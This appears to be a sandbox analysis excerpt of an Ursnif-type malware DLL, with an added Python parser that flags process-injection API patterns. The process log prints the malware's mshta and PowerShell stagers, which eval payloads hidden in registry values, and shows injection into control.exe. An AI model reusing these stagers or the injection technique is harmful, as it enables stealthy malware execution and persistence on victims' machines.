Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AB09CA NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02B96C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02B965B4 NtMapViewOfSection
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02B97562 GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02B9B2A9 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02BF0ABA NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02BF08B7 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_02BF0880 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C44582 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C24D95 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C2D551 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C3C51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C23EB7 NtMapViewOfSection
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C31635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C3963A GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C467CD GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C44FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C2B0A5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C309CA NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C3D9F4 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C42CA5 memset,NtQueryInformationProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C29690 NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C27E6C NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C3CFE8 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C2C0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C2B8F7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C3C0B8 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04C2D049 NtGetContextThread,RtlNtStatusToDosError
Source: C:\Windows\System32\control.exe | Code function: 42_2_00E2F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
Source: C:\Windows\System32\control.exe | Code function: 42_2_00E1617C NtAllocateVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 42_2_00E22B88 NtWriteVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 42_2_00E334E4 NtQueryInformationProcess
Source: C:\Windows\System32\control.exe | Code function: 42_2_00E32CC4 NtMapViewOfSection
Source: C:\Windows\System32\control.exe | Code function: 42_2_00E1EC38 NtReadVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 42_2_00E1EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose
Source: C:\Windows\System32\control.exe | Code function: 42_2_00E3B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor
Source: C:\Windows\System32\control.exe | Code function: 42_2_00E2CF2C NtCreateSection
Source: C:\Windows\System32\control.exe | Code function: 42_2_00E55027 NtProtectVirtualMemory,NtProtectVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 43_2_00E1F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
Source: C:\Windows\System32\control.exe | Code function: 43_2_00E0617C NtAllocateVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 43_2_00E12B88 NtWriteVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 43_2_00E234E4 NtQueryInformationProcess
Source: C:\Windows\System32\control.exe | Code function: 43_2_00E22CC4 NtMapViewOfSection
Source: C:\Windows\System32\control.exe | Code function: 43_2_00E0EC38 NtReadVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 43_2_00E0EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose
Source: C:\Windows\System32\control.exe | Code function: 43_2_00E2B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor
Source: C:\Windows\System32\control.exe | Code function: 43_2_00E1CF2C NtCreateSection
Source: C:\Windows\System32\control.exe | Code function: 43_2_00E45003 NtProtectVirtualMemory,NtProtectVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 45_2_0083F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
Source: C:\Windows\System32\control.exe | Code function: 45_2_0082617C NtAllocateVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 45_2_00832B88 NtWriteVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 45_2_00842CC4 NtMapViewOfSection
Source: C:\Windows\System32\control.exe | Code function: 45_2_008434E4 NtQueryInformationProcess
Source: C:\Windows\System32\control.exe | Code function: 45_2_0082EC38 NtReadVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 45_2_0082EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose
Source: C:\Windows\System32\control.exe | Code function: 45_2_0084B524 RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor
Source: C:\Windows\System32\control.exe | Code function: 45_2_0083CF2C NtCreateSection
Source: C:\Windows\System32\control.exe | Code function: 45_2_00865003 NtProtectVirtualMemory,NtProtectVirtualMemory
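The call sequences listed above are the primitives behind the report's injection and hooking verdicts: NtCreateSection followed by NtMapViewOfSection (mapping a section into a target process), NtWriteVirtualMemory with VirtualProtectEx (writing foreign memory), NtGetContextThread/NtSetContextThread (redirecting an existing thread), and NtWow64QueryInformationProcess64/NtWow64ReadVirtualMemory64 (32-bit code inspecting 64-bit processes). The Python script below is an added example, not part of the Joe Sandbox report and not code from the Ursnif sample. It parses evidence lines of the form shown above (both the raw export, where the source path runs straight into "Code function:" and the function id is repeated at the end of the cell, and the cleaned "Source: ... | Code function: ..." form), aggregates the APIs seen per process, and flags which primitives each process exhibits. The rule names and their API sets are this example's own labels; the sample lines are a constructed subset copied from the report above.

```python
import re
from collections import defaultdict

# Matches both the raw export ("...control.exeCode function: 43_2_00E19CD443_2_00E19CD4")
# and the cleaned form ("... | Code function: 43_2_00E19CD4 NtCreateSection").
LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<id>\d+_\d+_[0-9A-Fa-f]{8})\s*(?P<rest>.*?)\s*$"
)

# Rule names are this example's own labels. A rule fires for a process once
# every API in its set has been seen in at least one of that process's functions.
RULES = [
    ("section_mapping", {"NtCreateSection", "NtMapViewOfSection"}),
    ("remote_write", {"NtWriteVirtualMemory"}),
    ("thread_hijack", {"NtSetContextThread"}),
    ("wow64_cross_arch", {"NtWow64QueryInformationProcess64", "NtWow64ReadVirtualMemory64"}),
    ("token_inspection", {"NtOpenProcessToken", "NtQueryInformationToken"}),
    ("create_process_as_user", {"CreateProcessAsUserW"}),
]


def parse_line(line):
    """Split one evidence line into source path, process index, function id and API list."""
    m = LINE_RE.search(line)
    if not m:
        return None
    fid, rest = m.group("id"), m.group("rest")
    if rest.endswith(fid):  # the HTML export repeats the id as link text at the end
        rest = rest[: -len(fid)]
    apis = [a for a in rest.strip().split(",") if a]
    return {
        "source": m.group("src"),
        "process": fid.split("_")[0],  # first field of the id is the process index
        "id": fid,
        "apis": apis,
    }


def api_sets_by_process(lines):
    """Union of APIs per (source path, process index)."""
    sets = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec:
            sets[(rec["source"], rec["process"])].update(rec["apis"])
    return sets


def classify(lines):
    """Map (source path, process index) to the rule names whose API set is fully covered."""
    return {
        key: [name for name, needed in RULES if needed <= apis]
        for key, apis in api_sets_by_process(lines).items()
    }


# Constructed input: a subset of the evidence lines from the report above in the
# raw export form, plus one line in the cleaned form.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01038A31 CreateProcessAsUserW,0_2_01038A31",
    r"Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E7562 GetProcAddress,NtCreateSection,memset,0_2_013E7562",
    r"Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_013E65B4 NtMapViewOfSection,0_2_013E65B4",
    r"Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0103C51B memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,0_2_0103C51B",
    r"Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01031635 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,0_2_01031635",
    r"Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_01044FEA NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_01044FEA",
    r"Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0102C0CF memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,0_2_0102C0CF",
    r"Source: C:\Windows\System32\control.exeCode function: 43_2_00E19CD443_2_00E19CD4",
    r"Source: C:\Windows\System32\control.exeCode function: 42_2_00E2F83C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,42_2_00E2F83C",
    r"Source: C:\Windows\System32\control.exeCode function: 42_2_00E2CF2C NtCreateSection,42_2_00E2CF2C",
    r"Source: C:\Windows\System32\control.exeCode function: 42_2_00E32CC4 NtMapViewOfSection,42_2_00E32CC4",
    r"Source: C:\Windows\System32\control.exeCode function: 42_2_00E22B88 NtWriteVirtualMemory,42_2_00E22B88",
    r"Source: C:\Windows\System32\control.exeCode function: 42_2_00E1EDFC NtQueryInformationToken,NtQueryInformationToken,NtClose,42_2_00E1EDFC",
    r"Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04AC4FEA NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError",
]

if __name__ == "__main__":
    for (source, proc), hits in sorted(classify(SAMPLE_LINES).items()):
        print(f"{source} [process {proc}]: {', '.join(hits) or 'no injection primitives matched'}")
```

Aggregating per process rather than per function matters here: the section is created in one function and mapped in another, so a per-function rule would miss the pairing. The same aggregation reproduces the report's observation that the control.exe instances carry the section-mapping, remote-write and thread-context primitives while only the 32-bit loaders (loaddll32, regsvr32, rundll32) use the NtWow64 reads.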
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE (reported 4 times)
Source: 61b85f75e6a7c.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (60 RT_ICON resources, each reported with this type)
          Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
          Source: 61b85f75e6a7c.dll | Static PE information: invalid certificate
          Source: 61b85f75e6a7c.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll"
          Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
          Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
          Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer
          Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
          Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
          Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
          Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
          Source: C:\Windows\System32\control.exe | Process created: unknown unknown
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: unknown unknown
          Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20211214
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeezm4uy.clm.ps1
          Source: classification engine | Classification label: mal100.troj.evad.winDLL@59/52@18/5
          Source: C:\Windows\System32\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013E3309 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_013E3309
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{90B75C82-AFA5-4217-B9C4-5396FD38372A}
          Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{94968C51-E390-E6C0-0D08-C77A91BCEB4E}
          Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{A4AE14BF-B329-7663-5D18-970AE1CCBBDE}
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BC369832-EBA2-4EDB-55B0-4F6259E4F3B6}
          Source: C:\Windows\SysWOW64\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{9CBC1CBB-4BAF-2EBC-B590-AF42B9C45396}
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_01
          Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{20549BFE-FFF8-5232-8954-A3A6CDC8873A}
          Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{10D8DBC1-2F4C-C28B-3944-D3167DB8B7AA}
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_01
          Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{7CC0A445-AB21-0ECB-1570-0F2219A4B376}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{0C9EE140-FBC1-1ECF-E500-5F32E9340386}
          Source: C:\Windows\System32\loaddll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B8576863-B7B7-AA31-016C-DB7EC5603F92}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{C44FC282-5318-9641-FD38-372A81EC5BFE}
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_01
          Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: 61b85f75e6a7c.dll | Static file information: File size 1781920 > 1048576
          Source: 61b85f75e6a7c.dll | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fa00
          Source: Binary string: ntdll.pdb | source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP | source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
          Source: Binary string: rundll32.pdb | source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
          Source: Binary string: rundll32.pdbGCTL | source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013EE97E pushad ; iretd 0_2_013EE982
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013EAD40 push ecx; ret 0_2_013EAD49
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013EB073 push ecx; ret 0_2_013EB083
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0104C85E pushfd ; iretd 0_2_0104C869
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_010492B3 push ecx; ret 0_2_010492C3
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_01048D80 push ecx; ret 0_2_01048D89
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0827 push dword ptr [ebp-00000284h]; ret 0_2_013A087F
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A08B7 push dword ptr [ebp-00000284h]; ret 0_2_013A0A65
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A08B7 push dword ptr [ebp-0000028Ch]; ret 0_2_013A0AB9
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A08B7 push edx; ret 0_2_013A0B11
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A08B7 push dword ptr [esp+10h]; ret 0_2_013A0BFB
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0880 push dword ptr [ebp-00000284h]; ret 0_2_013A08B6
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0BFC push dword ptr [esp+0Ch]; ret 0_2_013A0C10
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0BFC push dword ptr [esp+10h]; ret 0_2_013A0C56
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0A66 push edx; ret 0_2_013A0B11
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0ABA push edx; ret 0_2_013A0B11
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A06F5 push dword ptr [ebp-00000284h]; ret 0_2_013A0764
          Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_013A0EC5 push 10021990h; ret 0_2_013A0ECC
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_049DB073 push ecx; ret 3_2_049DB083
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_049DAD40 push ecx; ret 3_2_049DAD49
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_049DE97E pushad ; iretd 3_2_049DE982
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0BFC push dword ptr [esp+0Ch]; ret 3_2_030E0C10
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0BFC push dword ptr [esp+10h]; ret 3_2_030E0C56
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0827 push dword ptr [ebp-00000284h]; ret 3_2_030E087F
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0A66 push edx; ret 3_2_030E0B11
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0880 push dword ptr [ebp-00000284h]; ret 3_2_030E08B6
          Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_030E0ABA push edx; ret 3_2_030E0B11
